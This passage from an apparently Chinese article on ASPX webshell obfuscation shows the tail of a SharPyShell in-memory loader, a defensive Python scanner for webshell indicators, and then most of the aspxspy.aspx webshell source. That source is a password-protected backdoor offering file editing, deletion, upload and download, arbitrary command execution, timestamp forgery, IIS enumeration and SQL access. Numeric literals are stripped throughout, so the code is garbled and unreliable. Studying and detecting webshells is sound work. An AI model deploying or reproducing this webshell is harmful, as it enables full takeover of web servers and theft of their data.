x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,
0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64,0x34,0x32,0x61,0x39,0x37,0x39,0x38,0x62,0x39,0x39,0x64,0x34,0x61,0x66,0x63,0x65,0x63,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x61,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0x65,0x65,0x31,0x64};
for(int i = ; i < a.Length; i++) a[i] ^= (byte)p[i % p.Length];
Assembly aS = Assembly.Load(a);
object o = aS.CreateInstance("SharPy");
MethodInfo mi = o.GetType().GetMethod("Run");
object[] iN = new object[] {r, p};
object oU = mi.Invoke(o, iN);
Response.Write(oU);
} </script>

Relevant Link:

https://www.freebuf.com/sectool/198286.html
https://github.com/antonioCoco/SharPyShell

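4. ASPX WEBSHELL Obfuscation Variants

For ASP.NET (ASPX) C# webshells there are relatively few obfuscation variants; most samples are full-featured "big" webshells (大马).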
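As a defensive counterpart to the listings in this article, the following added example (not part of the original post or of any tool it cites) scores an .aspx source file against constructs visible in the SharPyShell stager above and the aspxspy.aspx listing below. The rule names, weights, threshold and the three sample strings are assumptions constructed for illustration.

```python
import re

# (name, weight, pattern). Every pattern targets a construct that appears in
# the listings on this page; the weights are assumed, not tuned, values.
RULES = [
    ("request_validation_off", 1,
     re.compile(r'<%@\s*Page\b[^>]*\bvalidateRequest\s*=\s*"false"', re.I)),
    ("xor_decode_loop", 2,
     re.compile(r'\w+\s*\[\s*\w+\s*\]\s*\^=')),
    ("assembly_load", 3,
     re.compile(r'\bAssembly\s*\.\s*Load\s*\(')),
    ("reflection_invoke", 2,
     re.compile(r'\.\s*(CreateInstance|GetMethod)\s*\(')),
    ("process_with_redirected_io", 3,
     re.compile(r'\bRedirectStandard(Output|Input|Error)\s*=\s*true')),
    ("mssql_os_procs", 3,
     re.compile(r'\b(xp_cmdshell|sp_oacreate|sp_oamethod|sp_makewebtask|xp_dirtree)\b', re.I)),
    ("timestamp_rewrite", 2,
     re.compile(r'\b(File|Directory)\s*\.\s*Set(Creation|LastWrite|LastAccess)Time\s*\(')),
    ("iis_metabase_enum", 2,
     re.compile(r'IIS://localhost/W3SVC', re.I)),
    ("md5_password_gate", 1,
     re.compile(r'HashPasswordForStoringInConfigFile\s*\(')),
]

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
HEX_BYTE = re.compile(r"\b0x[0-9a-fA-F]{1,2}\b")
BLOB_MIN_BYTES = 200  # assumed cut-off for a "large inline byte array"
LOADER_CHAIN = {"xor_decode_loop", "assembly_load", "reflection_invoke"}


def scan(text):
    """Return (score, sorted indicator names) for one .aspx source text."""
    # Replace block comments with a space so tokens split by /* */ still match.
    # Line comments are left alone: stripping "//" would also eat URL-like
    # strings such as the IIS:// metabase path.
    norm = BLOCK_COMMENT.sub(" ", text)
    hits = {}
    for name, weight, pattern in RULES:
        if pattern.search(norm):
            hits[name] = weight
    if len(HEX_BYTE.findall(norm)) >= BLOB_MIN_BYTES:
        hits["embedded_byte_blob"] = 2
    # Co-occurrence bonus: decode a byte array, Assembly.Load it, then call
    # into it by reflection (the shape of the stager shown above).
    if LOADER_CHAIN.issubset(hits):
        hits["in_memory_loader_chain"] = 3
    return sum(hits.values()), sorted(hits)


def verdict(text, threshold=5):
    """Classify a source text; the threshold is an assumed value."""
    score, _ = scan(text)
    return "suspicious" if score >= threshold else "clean"


# --- Constructed sample inputs (fragments only, placeholder bytes) ---------
SAMPLE_LOADER = (
    '<%@ Page Language="C#" %>\n<script runat="server">\n'
    "byte[] a = {" + ", ".join(["0x41"] * 256) + "};\n"
    "for (int i = 0; i < a.Length; i++) a[i] ^= (byte)p[i % p.Length];\n"
    "Assembly aS = Assembly.Load(a);\n"
    'object o = aS.CreateInstance("SharPy");\n</script>'
)

SAMPLE_FILE_MANAGER = '''<%@ Page Language="C#" Debug="true" validateRequest="false" %>
<script runat="server">
string iisstr = "IIS://localhost/W3SVC";
Cmdpro.StartInfo.RedirectStandardOutput = true;
string exesql = "INSERT bin_dir EXEC MASTER..XP_dirtree @p,1,1;";
File.SetLastWriteTime(FileName, Convert.ToDateTime(t));
</script>'''

SAMPLE_BENIGN = '''<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    var m = typeof(string).GetMethod("ToUpper", Type.EmptyTypes);
    Response.Write(Server.HtmlEncode(DateTime.Now.ToString()));
}
</script>'''

if __name__ == "__main__":
    for label, sample in [("loader", SAMPLE_LOADER),
                          ("file manager", SAMPLE_FILE_MANAGER),
                          ("benign", SAMPLE_BENIGN)]:
        score, names = scan(sample)
        print(f"{label:13s} {verdict(sample):10s} score={score} {names}")
```

A single weak indicator, such as one reflection call in an ordinary page, stays below the threshold; a file that crosses it is a candidate for manual review, not a confirmed webshell.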

0x1: aspxspy.aspx

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"  %>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script runat="server">
/*
Thanks Snailsor,FuYu Code by Bin Make in China Blog: http://www.rootkit.net.cn E-mail : master@rootkit.net.cn
*/
public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin
public string SessionName = "ASPXSpy";
public string Bin_Action = "";
public string Bin_Request = "";
protected OleDbConnection conn = new OleDbConnection();
protected OleDbCommand comm = new OleDbCommand(); protected void Page_Load(object sender, EventArgs e)
{ if (Session[SessionName] != "BIN")
{
Bin_login();
}
else
{
if (!IsPostBack)
{
Bin_main();
}
else
{ Bin_Action = Request["goaction"];
if (Bin_Action == "del")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, );
}
if (Bin_Action == "change")
{
Bin_Request = Request["todo"];
Bin_FileList(Bin_Request);
}
if (Bin_Action == "deldir")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, );
}
if (Bin_Action == "down")
{
Bin_Request = Request["todo"];
Bin_Filedown(Bin_Request);
}
if (Bin_Action == "rename")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, );
}
if (Bin_Action == "renamedir")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, );
}
if (Bin_Action == "showatt")
{
Bin_Request = Request["todo"];
Bin_Fileatt(Bin_Request);
}
if (Bin_Action == "edit")
{
Bin_Request = Request["todo"];
Bin_FileEdit(Bin_Request);
}
if (Bin_Action == "postdata")
{ Bin_Request = Request["todo"];
Session["Bin_Table"] = Bin_Request;
Bin_DataGrid.CurrentPageIndex = ;
Bin_DBstrTextBox.Text = "";
Bin_Databind();
}
if (Bin_Action == "changedata")
{
Session["Bin_Table"] = null;
Bin_Request = Request["todo"];
Session["Bin_Option"] = Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_DBstrTextBox.Text = Bin_Request; }
if (Session["Bin_Table"] != null)
{
Bin_Databind();
} }
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = false;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
}
public void Bin_main()
{
TimeLabel.Text = DateTime.Now.ToString();
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = true;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>";
string HostName = "HostName : " + Environment.MachineName + "<br>";
string OS = "OS Version : " + Environment.OSVersion + "</br>";
string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>";
string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>";
InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>";
InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>";
InfoLabel.Text += Bin_Process() + "<hr>"; }
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$"); if (reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo = "";
string iisstart = "";
string iisend = "";
string iisstr = "IIS://localhost/W3SVC";
int i = ;
try
{
DirectoryEntry mydir = new DirectoryEntry(iisstr);
iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>";
foreach (DirectoryEntry child in mydir.Children)
{
if (CheckIsNumber(child.Name.ToString()))
{
string dirstr = child.Name.ToString();
string tmpstr = "";
DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr);
DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo += "<TR><TD align=center>" + (i = i + ) + "</TD>";
iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>";
iisinfo += "<TD>" + child.Properties["ServerBindings"][] + "</TD>";
iisinfo += "<TD><a href=javascript:Command('change','" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "');>" + newdir1.Properties["Path"].Value + "</a></TD>";
iisinfo += "</TR>";
}
}
iisend = "</TABLE><hr>";
}
catch (Exception error)
{
Bin_Error(error.Message);
}
return iisstart + iisinfo + iisend;
}
public string Bin_Process()
{
string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>";
string prostr = "";
string htmlend = "</TR></TABLE>";
try
{
Process[] myprocess = Process.GetProcesses();
foreach (Process p in myprocess)
{
prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>";
prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>";
prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>";
prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>";
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr + prostr + htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if (MD5Pass == Password)
{
Session[SessionName] = "BIN";
Bin_main();
}
else
{
Bin_login();
}
} protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Bin_login();
} protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_FilePanel.Visible = true;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text = formatpath(Server.MapPath("."));
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath(".")); } protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file = "<input type=hidden name=goaction><input type=hidden name=todo>";
file += "<hr>Drives : ";
string[] drivers = Directory.GetLogicalDrives();
for (int i = ; i < drivers.Length; i++)
{
file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a>&nbsp;";
}
file += " WebRoot : <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>";
Bin_FileLabel.Text = file;
} public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible = true;
Bin_CreateTextBox.Text = "";
Bin_CopytoTextBox.Text = "";
Bin_CopyTextBox.Text = Bin_path;
Bin_upTextBox.Text = Bin_path;
Bin_IISPanel.Visible = false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist = Bin_FilelistLabel.Text;
Bin_Filelist = "<hr>";
Bin_Filelist += "<table width=90% border=0 align=center>";
Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>";
Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>";
try
{
Bin_Filelist += "<tr><td>";
string parstr = "";
if (Bin_path.Length < )
{
parstr = formatpath(Bin_path); }
else
{
parstr = formatpath(Directory.GetParent(Bin_path).ToString()); }
Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|Parent Directory|</a></b></i>";
Bin_Filelist += "</td></tr>"; DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path);
foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name);
tmpstr += "<tr>";
tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i>&lt;dir&gt;</i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>Ren</a>|<a href=javascript:Command('showatt','" + foldername + "/');>Att</a>|<a href=javascript:Command('deldir','" + foldername + "');>Del</a></td>";
tmpstr += "</tr>";
}
foreach (FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name);
tmpstr += "<tr>";
tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>Edit</a>|<a href=javascript:Command('rename','" + filename + "');>Ren</a>|<a href=javascript:Command('down','" + filename + "');>Down</a>|<a href=javascript:Command('showatt','" + filename + "');>Att</a>|<a href=javascript:Command('del','" + filename + "');>Del</a></td>";
tmpstr += "</tr>";
}
tmpstr += "</talbe>";
}
catch (Exception Error)
{
Bin_Error(Error.Message); } Bin_FilelistLabel.Text = Bin_Filelist + tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if (type == )
{
File.Delete(instr);
}
if (type == )
{
foreach (string tmp in Directory.GetFileSystemEntries(instr))
{
if (File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, );
}
}
Directory.Delete(instr);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if (type == )
{
string[] array = instr.Split(','); File.Move(array[], array[]);
}
if (type == )
{
string[] array = instr.Split(',');
Directory.Move(array[], array[]);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize = MyFileStream.Length;
byte[] Buffer = new byte[(int)FileSize];
MyFileStream.Read(Buffer, , (int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename=" + instr);
Response.Charset = "UTF-8";
Response.ContentType = "application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
} }
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible = true;
Bin_FilePanel.Visible = true;
try
{
string Att = File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked = false;
Bin_SystemCheckBox.Checked = false;
Bin_HiddenCheckBox.Checked = false;
Bin_ArchiveCheckBox.Checked = false; if (Att.LastIndexOf("ReadOnly") != -)
{
Bin_ReadOnlyCheckBox.Checked = true;
}
if (Att.LastIndexOf("System") != -)
{
Bin_SystemCheckBox.Checked = true;
}
if (Att.LastIndexOf("Hidden") != -)
{
Bin_HiddenCheckBox.Checked = true;
}
if (Att.LastIndexOf("Archive") != -)
{
Bin_ArchiveCheckBox.Checked = true;
}
Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text = instr;
Session["FileName"] = instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible = true;
Bin_EditPanel.Visible = true;
Bin_DriveList();
Bin_EditpathTextBox.Text = instr;
StreamReader SR = new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text = SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{ string uppath = Bin_upTextBox.Text;
if (uppath.Substring(uppath.Length - , ) != @"/")
{
uppath = uppath + @"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value)); }
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text = "Error : " + error;
}
public string formatpath(string instr)
{
instr = instr.Replace(@"\", "/");
if (instr.Length < )
{
instr = instr.Replace(@"/", "");
}
if (instr.Length == )
{
instr = instr + @"/";
}
instr = instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr = instr.Replace(" ", "%20");
return instr; }
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile = Bin_CreateTextBox.Text;
string filepath = Bin_upTextBox.Text;
filepath = filepath + "/" + newfile;
try
{
StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default); }
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath = Bin_upTextBox.Text;
string newdir = Bin_CreateTextBox.Text;
newdir = dirpath + "/" + newdir;
try
{
Directory.CreateDirectory(newdir); }
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName = Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if (Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
} if (Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System);
}
if (Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden);
}
if (Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive);
}
if (FileName.Substring(FileName.Length - , ) == "/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>");
} protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>"); } protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
} protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = true;
Bin_SQLPanel.Visible = false;
Bin_CmdLabel.Text = "";
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
} protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro = new Process();
Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute = false;
Cmdpro.StartInfo.RedirectStandardInput = true;
Cmdpro.StartInfo.RedirectStandardOutput = true;
Cmdpro.StartInfo.RedirectStandardError = true;
Cmdpro.Start();
string cmdstr = Cmdpro.StandardOutput.ReadToEnd();
cmdstr = cmdstr.Replace("<", "&lt;");
cmdstr = cmdstr.Replace(">", "&gt;");
Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
} protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible =false;
} protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked = true;
Bin_AccRadioButton.Checked = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
} protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked = false;
Bin_AccRadioButton.Checked = true;
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false; }
protected void OpenConnection()
{
if (conn.State == ConnectionState.Closed)
{
try
{
conn.ConnectionString = Bin_SQLconnTextBox.Text;
comm.Connection = conn;
conn.Open();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if (conn.State == ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da = new OleDbDataAdapter();
DataTable datatable = new DataTable();
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = sqlstr;
da.SelectCommand = comm;
da.Fill(datatable);
}
catch (Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"] = null;
Bin_DataGrid.CurrentPageIndex = ;
Bin_DataGrid.AllowPaging = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false;
OpenConnection();
DataTable ver = Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo = "";
if (owner.Rows[][].ToString() == "")
{
dbo = "db_owner";
}
else
{
dbo = "public";
}
if (rol.Rows[][].ToString() == "")
{
dbo = "<font color=blue>sa</font>";
}
string db_info = "";
db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[][].ToString() + "<br><hr>";
string db_name = "";
for (int i = ; i < dbs.Rows.Count; i++)
{
db_name += dbs.Rows[i][].ToString().Replace(cdb.Rows[][].ToString(), "<font color=blue>" + cdb.Rows[][].ToString() + "</font>") + "&nbsp;|&nbsp;";
}
db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>";
db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>";
Bin_DBinfoLabel.Text = db_info;
}
if (Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible = false;
Bin_SAexecButton.Visible = false;
Bin_Accbind();
}
}
catch (Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = true;
OpenConnection();
DataTable acctable = new DataTable();
acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>";
accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!='')Command('postdata',this);>";
for (int i = ; i < acctable.Rows.Count; i++)
{
accstr += "<option value=" + acctable.Rows[i].ItemArray[].ToString() + ">" + acctable.Rows[i].ItemArray[].ToString() + "</option>";
}
if (Session["Bin_Table"] != null)
{
accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>";
}
accstr += "</SELECT>";
Bin_AccinfoLabel.Text = accstr;
CloseConnection();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible = false;
Bin_Accbind();
Bin_Scroll.Visible = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = false;
}
Bin_DataGrid.Visible = true;
DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
catch (Exception Error)
{ Bin_Error(Error.Message);
}
} public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = instr;
comm.ExecuteNonQuery();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{ for (int i = ; i < e.Item.Cells.Count; i++)
{
e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "&lt;").Replace(">", "&gt;");
} }
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex = e.NewPageIndex;
Bin_Databind();
}
